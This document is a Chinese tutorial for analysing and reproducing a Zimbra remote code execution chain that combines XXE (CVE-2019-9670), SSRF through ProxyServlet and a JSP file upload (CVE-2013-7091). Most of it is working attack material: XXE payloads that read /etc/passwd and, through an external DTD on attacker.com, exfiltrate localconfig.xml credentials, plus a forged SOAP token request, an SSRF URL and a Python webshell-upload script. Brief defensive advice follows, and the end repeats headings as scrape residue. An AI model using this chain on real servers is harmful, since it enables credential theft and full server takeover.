Zimbra RCE漏洞分析与复现指南<\/h1>

1. Zimbra简介<\/h2>
Zimbra是一款开源的协同办公套件，提供WebMail、日历、通信录、Web文档管理和创作等功能。其特色在于采用Ajax技术模仿CS桌面应用软件风格开发的客户端，兼容Firefox、Safari和IE浏览器。<\/p>

2. 漏洞概述<\/h2>

本教学文档将详细分析Zimbra系统中的多个安全漏洞，包括：<\/p>

XXE漏洞(CVE-2019-9670)<\/li>
SSRF漏洞<\/li>

文件上传漏洞(CVE-2013-7091)<\/li> <\/ul>

这些漏洞可组合利用，最终实现远程代码执行(RCE)。<\/p>

3. 环境准备<\/h2>

3.1 下载Zimbra<\/h3>

从官方地址下载Zimbra 8.6.0开源版：<\/p>

https:\/\/www.zimbra.com\/downloads\/zimbra-collaboration-open-source\/
<\/code><\/pre>
3.2 解压核心库<\/h3>
# 需要先安装rpm2cpio<\/span>
<\/span><\/span>rpm2cpio zimbra-core-8.6.0_GA_1153.RHEL6_64-20141215151155.x86_64.rpm | cpio -div
<\/span><\/span><\/code><\/pre>4. XXE漏洞利用(CVE-2019-9670)<\/h2>
4.1 漏洞定位<\/h3>
通过查找Autodiscover相关类：<\/p>
find . -name "*.jar"<\/span>|awk '{print "jar -tvf "$1}'<\/span> | sh -x | grep -i Autodiscover
<\/span><\/span><\/code><\/pre>确认com\/zimbra\/cs\/service\/AutoDiscoverServlet.class<\/code>是目标类。<\/p>
4.2 漏洞分析<\/h3>
AutoDiscoverServlet处理POST请求时：<\/p>

读取请求内容并解析为XML文档<\/li>
查找Request标签中的EMailAddress和AcceptableResponseSchema<\/li>
如果AcceptableResponseSchema不符合预期，会将其内容返回给用户<\/li>
<\/ol>
4.3 漏洞利用<\/h3>
构造恶意XML读取本地文件：<\/p>
<!DOCTYPE xxe [
<\/span><\/span><\/span><!ELEMENT name ANY ><\/span>
<\/span><\/span><!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd" ><\/span>]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>    <Request><\/span>
<\/span><\/span>      <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>      <AcceptableResponseSchema><\/span>&xxe;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>    <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>4.4 读取配置文件<\/h3>
由于localconfig.xml是XML格式，需要使用外部DTD和CDATA：<\/p>
<!DOCTYPE Autodiscover [
<\/span><\/span><\/span>        <!ENTITY % dtd SYSTEM "http:\/\/attacker.com\/dtd"><\/span>
<\/span><\/span>        %dtd;
<\/span><\/span>        %all;
<\/span><\/span>        ]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>    <Request><\/span>
<\/span><\/span>        <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>        <AcceptableResponseSchema><\/span>&fileContents;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>    <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>外部DTD内容：<\/p>
<!ENTITY % file SYSTEM "file:..\/conf\/localconfig.xml"><\/span>
<\/span><\/span><!ENTITY % start "<![CDATA["><\/span>
<\/span><\/span><!ENTITY % end "]]><\/span>">
<\/span><\/span><!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'><\/span>">
<\/span><\/span><\/code><\/pre>5. SSRF漏洞利用<\/h2>
5.1 获取低权限Token<\/h3>
通过SOAP接口发送AuthRequest：<\/p>
<soap:Envelope<\/span> xmlns:soap=<\/span>"http:\/\/www.w3.org\/2003\/05\/soap-envelope"<\/span>><\/span>
<\/span><\/span>   <soap:Header><\/span>
<\/span><\/span>       <context<\/span> xmlns=<\/span>"urn:zimbra"<\/span>><\/span>
<\/span><\/span>           <userAgent<\/span> name=<\/span>"ZimbraWebClient - SAF3 (Win)"<\/span> version=<\/span>"5.0.15_GA_2851.RHEL5_64"<\/span>\/><\/span>
<\/span><\/span>       <\/context><\/span>
<\/span><\/span>   <\/soap:Header><\/span>
<\/span><\/span>   <soap:Body><\/span>
<\/span><\/span>     <AuthRequest<\/span> xmlns=<\/span>"urn:zimbraAccount"<\/span>><\/span>
<\/span><\/span>        <account<\/span> by=<\/span>"adminName"<\/span>><\/span>zimbra<\/account><\/span>
<\/span><\/span>        <password><\/span>xxxx<\/password><\/span>
<\/span><\/span>     <\/AuthRequest><\/span>
<\/span><\/span>   <\/soap:Body><\/span>
<\/span><\/span><\/soap:Envelope><\/span>
<\/span><\/span><\/code><\/pre>5.2 利用ProxyServlet进行SSRF<\/h3>
通过ProxyServlet访问管理端口(7071)：<\/p>
https:\/\/target.com\/service\/proxy?target=https:\/\/127.0.0.1:7071\/service\/admin\/soap
<\/code><\/pre>
关键点：<\/p>

设置Host头为foo:7071<\/code><\/li>
Cookie中使用低权限Token：ZM_ADMIN_AUTH_TOKEN=admin_token<\/code><\/li>
发送相同的SOAP请求，但AuthRequest的xmlns改为urn:zimbraAdmin<\/code><\/li>
<\/ol>
6. 文件上传漏洞(CVE-2013-7091)<\/h2>
6.1 利用clientUploader上传文件<\/h3>
使用Python requests库上传JSP文件：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>f =<\/span> {
<\/span><\/span>    'filename1'<\/span>:(None<\/span>,"justatest.jsp"<\/span>,None<\/span>),
<\/span><\/span>    'clientFile'<\/span>:("justatest123.jsp"<\/span>,r<\/span>'<<\/span>%o<\/span>ut.println("justatest");%>'<\/span>,"text\/plain"<\/span>),
<\/span><\/span>    'requestId'<\/span>:(None<\/span>,"12"<\/span>,None<\/span>),
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "Cookie"<\/span>:"ZM_ADMIN_AUTH_TOKEN=admin_token"<\/span>,
<\/span><\/span>    "Host"<\/span>:"foo:7071"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post("https:\/\/target.com\/service\/extension\/clientUploader\/upload"<\/span>, 
<\/span><\/span>                 files=<\/span>f, headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>print(r.<\/span>text)
<\/span><\/span><\/code><\/pre>7. 漏洞组合利用流程<\/h2>

利用XXE漏洞读取localconfig.xml获取管理员凭证<\/li>
使用管理员凭证获取低权限Token<\/li>
通过SSRF漏洞利用低权限Token获取高权限Token<\/li>
使用高权限Token通过文件上传漏洞上传WebShell<\/li>
访问上传的WebShell实现RCE<\/li>
<\/ol>
8. 防御建议<\/h2>

禁用XML外部实体解析<\/li>
对ProxyServlet进行严格的访问控制<\/li>
限制文件上传功能，验证文件内容和类型<\/li>
及时更新Zimbra到最新版本<\/li>
实施最小权限原则，限制管理接口的访问<\/li>
<\/ol>
9. 参考资源<\/h2>

原文地址: https:\/\/blog.tint0.com\/2019\/03\/a-saga-of-code-executions-on-zimbra.html<\/li>
Zimbra官方文档: https:\/\/wiki.zimbra.com\/<\/li>
SOAP API参考: https:\/\/files.zimbra.com\/docs\/soap_api\/8.0.4\/soap-docs-804\/api-reference\/index.html<\/li>
XXE OOB技术: https:\/\/www.acunetix.com\/blog\/articles\/band-xml-external-entity-oob-xxe\/<\/li>
<\/ol>

Zimbra RCE漏洞分析与复现指南<\/h1>

1. Zimbra简介<\/h2> Zimbra是一款开源的协同办公套件，提供WebMail、日历、通信录、Web文档管理和创作等功能。其特色在于采用Ajax技术模仿CS桌面应用软件风格开发的客户端，兼容Firefox、Safari和IE浏览器。<\/p>

3. 环境准备<\/h2>

4. XXE漏洞利用(CVE-2019-9670)<\/h2>

5. SSRF漏洞利用<\/h2>

6. 文件上传漏洞(CVE-2013-7091)<\/h2>

1. Zimbra简介<\/h2>
Zimbra是一款开源的协同办公套件，提供WebMail、日历、通信录、Web文档管理和创作等功能。其特色在于采用Ajax技术模仿CS桌面应用软件风格开发的客户端，兼容Firefox、Safari和IE浏览器。<\/p>